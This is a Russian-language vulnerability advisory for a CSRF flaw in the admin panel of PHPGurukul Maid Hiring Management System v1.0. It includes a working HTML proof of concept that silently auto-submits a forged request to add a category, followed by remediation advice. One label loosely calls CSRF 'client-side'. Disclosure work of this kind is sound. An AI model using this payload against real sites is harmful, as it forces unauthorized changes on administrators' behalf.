
Доказательство концепции уязвимости CSRF в PHPGurukul Maid Hiring Management System v1.0, демонстрирующее неавторизованное создание категорий с помощью поддельных вредоносных запросов.
Имя проекта и URL репозитория: Maid Hiring Management System using PHP and MySQL
Тип уязвимости: Подделка запроса на стороне клиента (CSRF)
Затронутая версия: v1.0
💣Описание уязвимости: В панели администратора PHPGurukul Hiring Management System существует уязвимость межсайтовой подделки запроса (CSRF), позволяющая злоумышленнику добавлять произвольные категории найма, обманом заставляя аутентифицированного администратора перейти на вредоносный сайт. Это может привести к загрязнению данных и несанкционированным изменениям на уровне администратора.
👩💻Воздействие: Несанкционированное создание категорий
🛜Доказательство концепции (PoC)

/admin/add-category.php
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


Рекомендация: Реализовать CSRF-токены в формах администратора, принудительно использовать SameSite-куки и проверять источник запроса для предотвращения несанкционированных действий.